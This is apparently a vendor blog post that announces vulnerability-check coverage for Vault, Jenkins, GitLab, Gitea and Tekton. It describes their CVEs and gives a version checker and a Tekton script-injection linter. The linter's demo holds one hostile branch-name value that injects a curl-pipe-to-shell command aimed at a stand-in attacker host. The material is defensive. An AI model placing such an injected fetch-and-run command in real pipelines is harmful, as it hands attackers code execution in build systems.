
Expanding Coverage: Security Tooling and CI/CD Infrastructure

Robert · Updated May 12, 2026 · 5 min read


Five new products are live on Attestd.

Security Tooling: HashiCorp Vault

CI/CD Infrastructure: Jenkins, GitLab, Gitea, Tekton Pipelines


Why this batch matters

Vault, Jenkins, GitLab, Gitea, and Tekton all sit at the same intersection: secrets, source code, and deployment pipelines. A compromised instance in any of these tools typically gives an attacker lateral movement across the entire infrastructure stack, not just the tool itself. The credentials stored in Vault fund further attacks. The pipelines running in Jenkins and GitLab build and ship everything else. The source code in GitLab and Gitea is the target and the vector simultaneously.

Two CVEs in this batch are on the CISA KEV list and have been actively weaponised in real incidents. They are the right place to start.


Jenkins — CVE-2024-23897 (CISA KEV, CVSS 9.8)

CVE-2024-23897 is an arbitrary file read vulnerability in the Jenkins CLI. The args4j command parser the CLI uses expands an `@` followed by a file path into that file's contents, so an attacker can read files from the Jenkins controller file system, including secrets, credentials, and SSH keys. An attacker with Overall/Read permission (which the "allow anonymous read access" setting grants to everyone) can read entire files; without that permission, the first few lines of a file can still be read, which is enough to recover material such as the initial admin password or the binary keys Jenkins uses to encrypt stored credentials. In practice, successful exploitation has led to full remote code execution on unpatched instances by chaining the file read with other weaknesses.

Jenkins 2.442 and LTS 2.426.3 patch this. Note that the two release lines share one version space: weekly releases carry two components (2.441) and LTS releases three (2.426.2), so compare against the threshold for the line you actually run rather than against a single number. Any Jenkins instance below the threshold for its line is running a CISA KEV listed vulnerability that has been exploited in the wild.

```bash
curl "https://api.attestd.io/v1/check?product=jenkins&version=2.441" \
  -H "Authorization: Bearer YOUR_API_KEY"
```

Returns riskState: "critical".


GitLab — CVE-2023-7028 and CVE-2024-45409

CVE-2023-7028 (CVSS 10.0) is an account takeover vulnerability affecting GitLab CE and EE versions 16.1 through 16.7.1. The password reset endpoint accepted a list of email addresses rather than a single one, so an attacker could request a reset for a victim's verified address and have the reset link delivered to an attacker-controlled, unverified address as well. The result is full account takeover without any prior access; accounts with 2FA enabled could still have their password reset but could not be signed into without the second factor. Patched in 16.7.2, with backports to 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6 and 16.6.4, but the 16.7.x line carries additional CVEs that keep the risk state elevated.

CVE-2024-45409 (CVSS 10.0) is a signature verification bypass in the ruby-saml library GitLab uses for SAML single sign-on. An attacker who holds any document signed by the identity provider can forge a SAML response and sign in as any user, including administrators. No GitLab credentials are required, but the instance must have SAML authentication enabled. Because the forged response never passes through the identity provider, MFA enforced at the IdP does not help; 2FA enforced by GitLab itself still prompts the attacker for a second factor. Fixed in GitLab 17.3.3, 17.2.7, 17.1.8, 17.0.8 and 16.11.10.

```bash
curl "https://api.attestd.io/v1/check?product=gitlab&version=16.7.0" \
  -H "Authorization: Bearer YOUR_API_KEY"
```

Returns riskState: "critical".
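Both advisories above show why "is my version below X" is the wrong question: Jenkins fixes the same bug at 2.442 on the weekly line and at 2.426.3 on the LTS line, and GitLab ships one backport per supported minor line. The following is an added example, not Attestd's client or either vendor's code. It encodes the fixed versions named in this post and answers the affected-or-not question offline, so it can be compared against what the API reports. The version tables and the Jenkins weekly/LTS heuristic (two components versus three) are assumptions taken from the vendor advisories referenced here.

```python
"""Offline affected-version checks for the Jenkins and GitLab CVEs above.

Added example, not Attestd code. Version tables come from the vendor
advisories referenced in the text; no network access is needed.
"""
from __future__ import annotations


def parse_version(version: str) -> tuple[int, ...]:
    """'16.7.2-ee' -> (16, 7, 2); edition and build suffixes are ignored."""
    core = version.split("-")[0].split("+")[0]
    return tuple(int(part) for part in core.split("."))


def jenkins_cve_2024_23897(version: str) -> bool:
    """True if a Jenkins controller at this version is affected.

    Jenkins runs two release lines in one version space: weekly builds are
    two components (2.441), LTS builds are three (2.426.2). The fixes are
    2.442 (weekly) and 2.426.3 (LTS), so a single numeric threshold is
    wrong: LTS 2.426.3 is patched although it sorts below weekly 2.441,
    which is vulnerable.
    """
    parts = parse_version(version)
    if len(parts) == 3:          # LTS line
        return parts < (2, 426, 3)
    if len(parts) == 2:          # weekly line
        return parts < (2, 442)
    raise ValueError(f"unrecognised Jenkins version: {version!r}")


# GitLab ships one fix per supported minor line, so the check is "which line
# am I on, and is my patch release older than that line's fix".
# Keys are (major, minor); values are the first fixed release on that line.
GITLAB_CVE_2023_7028 = {
    (16, 1): (16, 1, 6), (16, 2): (16, 2, 9), (16, 3): (16, 3, 7),
    (16, 4): (16, 4, 5), (16, 5): (16, 5, 6), (16, 6): (16, 6, 4),
    (16, 7): (16, 7, 2),
}
GITLAB_CVE_2024_45409 = {
    (16, 11): (16, 11, 10), (17, 0): (17, 0, 8), (17, 1): (17, 1, 8),
    (17, 2): (17, 2, 7), (17, 3): (17, 3, 3),
}


def gitlab_affected(version: str, fixed_by_line: dict,
                    introduced: tuple | None = None) -> bool:
    """True if `version` predates the fix for its minor line.

    `introduced` is the release that first shipped the bug (CVE-2023-7028
    began in 16.1.0). Without it, every line older than the oldest patched
    line is treated as affected: those lines are out of support and never
    received a backport (the CVE-2024-45409 case). Lines newer than the
    newest patched line shipped with the fix already in.
    """
    parts = parse_version(version)
    if introduced is not None and parts < introduced:
        return False
    line = parts[:2]
    if line in fixed_by_line:
        return parts < fixed_by_line[line]
    return line < min(fixed_by_line)


def gitlab_cves(version: str) -> list[str]:
    """CVE ids from this post that apply to a given GitLab version."""
    hits = []
    if gitlab_affected(version, GITLAB_CVE_2023_7028, introduced=(16, 1, 0)):
        hits.append("CVE-2023-7028")
    if gitlab_affected(version, GITLAB_CVE_2024_45409):
        hits.append("CVE-2024-45409")
    return hits


if __name__ == "__main__":
    for v in ("2.441", "2.442", "2.426.2", "2.426.3"):
        print(f"jenkins {v}: {'affected' if jenkins_cve_2024_23897(v) else 'ok'}")
    for v in ("16.7.0", "16.7.2", "16.0.8", "17.3.2", "17.4.0"):
        print(f"gitlab {v}: {gitlab_cves(v) or 'ok'}")
```

The per-line table is the general shape of most enterprise backport schedules, so `gitlab_affected` works unchanged for any CVE whose advisory lists one fixed release per supported line; only the table and, where known, the introducing release change.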


HashiCorp Vault

Vault is the secrets management layer for most modern infrastructure. CVEs here have outsized consequences because Vault credentials fund lateral movement everywhere else.

Two CVEs of note in the current data:

CVE-2023-0620 is a SQL injection vulnerability in Vault's Microsoft SQL Server (MSSQL) storage backend. Schema and table names taken from the storage configuration were interpolated into SQL without sanitisation, so an attacker able to write Vault's configuration could inject SQL that the backend executes against the storage database. The position required is already highly privileged, which is why the score is moderate despite the impact. CVSS 7.2.

CVE-2024-2660 is an OCSP validation flaw in Vault's TLS certificate auth method. When the auth method is configured to check client certificate status via OCSP, Vault did not correctly validate the OCSP response, so a revoked client certificate could still be accepted for login. Fixed in Vault 1.16.1 and 1.15.7. CVSS 6.4.

The 1.12.x line carries higher risk than the current 1.17.x line:

```bash
# Older 1.12.x line
curl "https://api.attestd.io/v1/check?product=hashicorp_vault&version=1.12.0" \
  -H "Authorization: Bearer YOUR_API_KEY"
# → riskState: "high"

# Current 1.17.x line
curl "https://api.attestd.io/v1/check?product=hashicorp_vault&version=1.17.0" \
  -H "Authorization: Bearer YOUR_API_KEY"
# → riskState: "none"
```

Gitea

Gitea is a self-hosted Git service widely used as a GitHub alternative in private infrastructure and air-gapped environments. Two CVEs in the current data: CVE-2022-1058, an open redirect via the login form (CVSS 6.1), and CVE-2023-22464, a cross-site scripting vulnerability via issue comments.

The risk level is lower than for Jenkins and GitLab, but Gitea instances often run with broader internal access than their exposure suggests: they hold source code and CI webhook access in one place.


Tekton Pipelines

Tekton is the Kubernetes-native CI/CD framework underlying several major pipeline platforms. The current NVD data under linuxfoundation:tekton_pipelines includes a pipeline step injection finding through untrusted workspace content. Tekton's attack surface is the pipeline definition itself: if an attacker can influence workspace content that pipeline steps consume, they can inject arbitrary commands into the build.
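The injection point is easy to reproduce because Tekton substitutes `$(params.NAME)` textually before the step container starts: a param that lands inside a `script:` block becomes part of the shell program, not a value the shell receives. The block below is an added example, not Tekton's code or part of the NVD finding referenced above. It embeds two constructed Task definitions (as Python dicts, the way a YAML loader would return them), flags the unsafe pattern, and shows what the rendered script looks like when the `ref` param is attacker-controlled. The hardened Task routes the same value through `env:` so the shell only ever sees it as a quoted variable, which is the pattern Tekton's own documentation recommends. The Task names, images and the hostile value are assumptions for illustration.

```python
"""Flag Tekton Task steps that splice a param into a shell script.

Added example, not Tekton's code. Tekton performs $(params.NAME) substitution
textually before the container starts, so a param that lands inside
`script:` is executed as shell, not treated as data.
"""
from __future__ import annotations

import re

# Matches $(params.name) and the array form $(params.name[*]).
PARAM_REF = re.compile(r"\$\(params\.([A-Za-z0-9_.-]+)(?:\[\*\])?\)")

# Constructed sample: the ref to build comes from a webhook payload, i.e. from
# whoever can push or open a merge request, and is pasted into the script.
UNSAFE_TASK = {
    "apiVersion": "tekton.dev/v1",
    "kind": "Task",
    "metadata": {"name": "build"},
    "spec": {
        "params": [{"name": "ref", "type": "string"}],
        "steps": [{
            "name": "checkout-and-build",
            "image": "alpine/git",
            "script": "#!/bin/sh\nset -e\ngit checkout $(params.ref)\nmake\n",
        }],
    },
}

# Hardened form: the same value reaches the shell as an environment variable,
# so a hostile ref is one argument to git and cannot start a second command.
SAFE_TASK = {
    "apiVersion": "tekton.dev/v1",
    "kind": "Task",
    "metadata": {"name": "build"},
    "spec": {
        "params": [{"name": "ref", "type": "string"}],
        "steps": [{
            "name": "checkout-and-build",
            "image": "alpine/git",
            "env": [{"name": "REF", "value": "$(params.ref)"}],
            "script": "#!/bin/sh\nset -e\ngit checkout \"$REF\"\nmake\n",
        }],
    },
}


def script_param_refs(task: dict) -> list[tuple[str, str]]:
    """Return (step name, param name) for every $(params.X) inside a step script."""
    findings = []
    for step in task.get("spec", {}).get("steps", []):
        for match in PARAM_REF.finditer(step.get("script", "")):
            findings.append((step.get("name", "<unnamed>"), match.group(1)))
    return findings


def render_script(script: str, params: dict[str, str]) -> str:
    """Mimic Tekton's textual substitution so the resulting shell is visible."""
    return PARAM_REF.sub(lambda m: params.get(m.group(1), m.group(0)), script)


def lint(task: dict) -> list[str]:
    """Human-readable findings for one Task; empty when the Task is clean."""
    name = task.get("metadata", {}).get("name", "<unnamed>")
    return [
        f"{name}/{step}: $(params.{param}) is interpolated into a shell script; "
        f"pass it via env: or args: and reference it as a quoted variable"
        for step, param in script_param_refs(task)
    ]


if __name__ == "__main__":
    # Constructed hostile input: a "branch name" that is really two commands.
    hostile = {"ref": "main; curl http://attacker.invalid/x | sh"}
    print(render_script(UNSAFE_TASK["spec"]["steps"][0]["script"], hostile))
    for finding in lint(UNSAFE_TASK) + lint(SAFE_TASK):
        print(finding)
```

Running the linter over every Task in a repository before it is applied to the cluster is a cheap admission-time control; the same check generalises to `$(workspaces.*)` and `$(results.*)` references if the content behind them is attacker-influenced, which is the workspace case the NVD entry describes.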


Checking your CI/CD stack

All five products are available via the standard /v1/check endpoint. The slugs are hashicorp_vault, jenkins, gitlab, gitea, and tekton.

```python
from attestd import Client

client = Client(api_key="YOUR_API_KEY")

# product slug -> deployed version, as reported by each tool itself
cicd_stack = {
    "jenkins": "2.441",
    "gitlab": "16.7.0",
    "hashicorp_vault": "1.12.0",
    "gitea": "1.19.0",
    "tekton": "0.50.0",
}

for product, version in cicd_stack.items():
    result = client.check(product, version)
    # report anything above the baseline, with the fix version when one is known
    if result.risk_state in ("critical", "high", "elevated"):
        print(f"{product} {version}: {result.risk_state}")
        if result.fixed_version:
            print(f"  Fix: {result.fixed_version}")
```

The common thread

pip-audit and npm audit scan Python and JavaScript dependencies. They do not reach Vault, Jenkins, GitLab, Gitea, or Tekton, because these products are infrastructure: they do not appear in a requirements.txt or a package.json. A pipeline can gate on risk_state != "none" without the team tracking NVD advisories for each tool by hand.

CVE-2024-23897 (Jenkins) and CVE-2023-7028 (GitLab) are both on the CISA KEV list and have been used in real attacks. Both would have returned riskState: "critical" on the affected versions since Attestd added coverage.

Full product reference at attestd.io/docs/products.

Get an API key at api.attestd.io/portal/login. Free tier, 1,000 calls a month, no credit card required.